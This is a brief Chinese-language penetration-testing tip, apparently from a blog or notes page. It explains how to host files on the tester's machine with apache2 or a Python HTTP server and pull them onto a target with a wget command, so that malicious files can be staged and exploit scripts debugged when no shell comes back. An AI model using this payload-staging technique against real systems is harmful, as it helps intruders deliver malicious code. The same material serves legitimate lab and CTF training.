我们做渗透时
有很多情形需要从本机传输文件到靶机,或者在某处需要调动本机的恶意文件
可以本机开启apache2,
systemctl start apache2
这样你本机里/var/www/html路径下存放的文件,就可以通过http调用了。
形式就是你的ip + 文件。 比如你的ip是10.10.10.10. 文件是xxx
就在靶机里输 wget http://10.10.10.10/xxx
就可以下载这个文件了到靶机了
但是也有很多情况的漏洞利用较复杂。
有些漏洞的脚本利用可能是先调用文件,再执行。等
但是我们没有收到shell
排查问题,到底是调用本机文件就出问题了,还是后面的执行环节出问题了
systemctl start apache2这个还不够
而
python搭建的简易http服务很方便。本机打开
python -m SimpleHTTPServer 80
同样的功效,
还能看是否调用
成功的是200
失败的是404
如果没有任何显示,那就是根本在调用环节就出了问题,没有来你本机找文件。还要继续排查是哪个命令弄错了。